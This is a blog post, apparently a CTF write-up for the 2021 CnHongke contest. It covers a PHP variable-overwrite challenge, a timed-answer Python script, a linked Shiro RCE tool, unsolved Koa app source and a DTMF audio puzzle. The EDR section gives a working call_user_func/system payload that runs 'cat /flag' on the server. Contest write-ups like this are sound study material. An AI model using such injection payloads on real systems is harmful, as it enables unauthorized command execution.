follow my dream

CnHongke

web misc
字数统计: 736阅读时长: 4 min
2021/03/14 Share

image-20210205120848244

WEB

EDR

1
2
3
4
5
6
extract($argv);
var_dump($collect);
if (!isset($limit)) {
    return;
}
$result = $collect($path, $row, $limit, $host);

变量覆盖 加 call_user_func

payload 

1
host=cat /flag&limit=system&path=call_user_func&row=call_user_func&collect=call_user_func

fast x 3

原题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
import requests
import re,urllib.parse,binascii
# 必须要有Cookie,否则每次读取的值不一样,不能正常解题
header = { 
    "Cookie":"session=3318ae57-680f-45f8-864a-14dbdf736032; PHPSESSID=397hupqilugksvv6ebidg8dha1"
}
 
url = "http://180.109.90.207:23939"
rep = requests.get(url,headers=header)
 
ress = rep.text
res = re.findall('id="math">(.*?)</div></b>',ress)
print(res)

n = len(res[0])
re = res[0]
a= []
for i in range(0,n):
    a.append(re[i])
a.sort()
b = []
count = 0 
 
for i in range(0,n-1):
    if(a[i] != a[i+1]):
        b.append(a[i])
b.append(a[-1])
 
count = []
mnm = []
for i in range (len(b)):
    mmm = 0 
    for j in range(len(a)):
        if(b[i] ==  a[j]):
            mmm = mmm + 1
    mnm.append(mmm)
    count.append(mmm)
 
count.sort()
sss =''
print(mnm,count)
for i in range(len(b)):
    for j in range(len(b)):
        if(count[i] == mnm[j] ):
            sss=sss+b[j]
 
print(sss)
data= {
    "res":sss
}
ccc = requests.post(url,data=data,headers=header)
 
print(ccc.text)

Shiro

https://github.com/wyzxxz/shiro_rce_tool

image-20210205101832778

Reset [没有做出来]

获得源代码

image-20210205114656772

  • app.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
const Koa = require('koa');
const bodyParser = require('koa-bodyparser');
const controller = require('./controller');
const templating = require('./templating');
const app = new Koa();
const isProduction = process.env.NODE_ENV === 'production';

app.use(async (ctx, next) => {
    console.log(`Process ${ctx.request.method} ${ctx.request.url}...`);
    await next();
});

let staticFiles = require('./static-files');
app.use(staticFiles('/static/', __dirname + '/static'));

app.use(bodyParser());

app.use(templating('views', {
    noCache: !isProduction,
    watch: !isProduction
}));

app.use(controller());

app.listen(3000);
console.log('app started at port 3000...');
  • controller.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
const fs = require('fs');

function addMapping(router, mapping) {
    for (var url in mapping) {
        if (url.startsWith('GET ')) {
            var path = url.substring(4);
            router.get(path, mapping[url]);
            console.log(`register URL mapping: GET ${path}`);
        } else if (url.startsWith('POST ')) {
            var path = url.substring(5);
            router.post(path, mapping[url]);
            console.log(`register URL mapping: POST ${path}`);
        } else if (url.startsWith('PUT ')) {
            var path = url.substring(4);
            router.put(path, mapping[url]);
            console.log(`register URL mapping: PUT ${path}`);
        } else if (url.startsWith('DELETE ')) {
            var path = url.substring(7);
            router.del(path, mapping[url]);
            console.log(`register URL mapping: DELETE ${path}`);
        } else {
            console.log(`invalid URL: ${url}`);
        }
    }
}

function addControllers(router, dir) {
    fs.readdirSync(__dirname + '/' + dir).filter((f) => {
        return f.endsWith('.js');
    }).forEach((f) => {
        console.log(`process controller: ${f}...`);
        let mapping = require(__dirname + '/' + dir + '/' + f);
        addMapping(router, mapping);
    });
}

module.exports = function (dir) {
    let
        controllers_dir = dir || 'controllers',
        router = require('koa-router')();
    addControllers(router, controllers_dir);
    return router.routes();
};
  • templating.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
const nunjucks = require('nunjucks');

function createEnv(path, opts) {
    var
        autoescape = opts.autoescape === undefined ? true : opts.autoescape,
        noCache = opts.noCache || false,
        watch = opts.watch || false,
        throwOnUndefined = opts.throwOnUndefined || false,
        env = new nunjucks.Environment(
            new nunjucks.FileSystemLoader(path, {
                noCache: noCache,
                watch: watch,
            }), {
                autoescape: autoescape,
                throwOnUndefined: throwOnUndefined
            });
    if (opts.filters) {
        for (var f in opts.filters) {
            env.addFilter(f, opts.filters[f]);
        }
    }
    return env;
}

function templating(path, opts) {
    var env = createEnv(path, opts);
    return async (ctx, next) => {
        ctx.render = function (view, model) {
            ctx.response.body = env.render(view, Object.assign({}, ctx.state || {}, model || {}));
            ctx.response.type = 'text/html';
        };
        await next();
    };
}

module.exports = templating;

MISC

DTMF

audacity 转换音频格式

再利用dtmf2num.exe 获得信息

image-20210205103045343

原文作者:fe1w0

原文链接:https://fe1w0.github.io/2021/03/14/CnHongKe/

发表日期:March 14th 2021, 12:00:00 pm

更新日期:March 15th 2021, 12:54:32 am

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. WEB
    1. 1.1. EDR
    2. 1.2. fast x 3
    3. 1.3. Shiro
    4. 1.4. Reset [没有做出来]
  2. 2. MISC
    1. 2.1. DTMF
Total : 48
2021
2020
2019
ctf web sql-injection ssti python misc cumt Windows PHP-Parser php Struts2 xss labs life flask crypto git Socks Tools c/c++ 流量分析 mysql udf 信安之路 mysql 通达OA fastjson thinkphp 内网渗透 红日靶场 buuctf docker curl weblogic WEB环境搭建 bypass_open_basedir bypass_disable_function
2020-ctf 2020-ctf 2019-ctf 2021-ctf 漏洞复现 PHP XSS life flask git 项目-工具 SQLI 内网渗透 基础知识 upload 环境搭建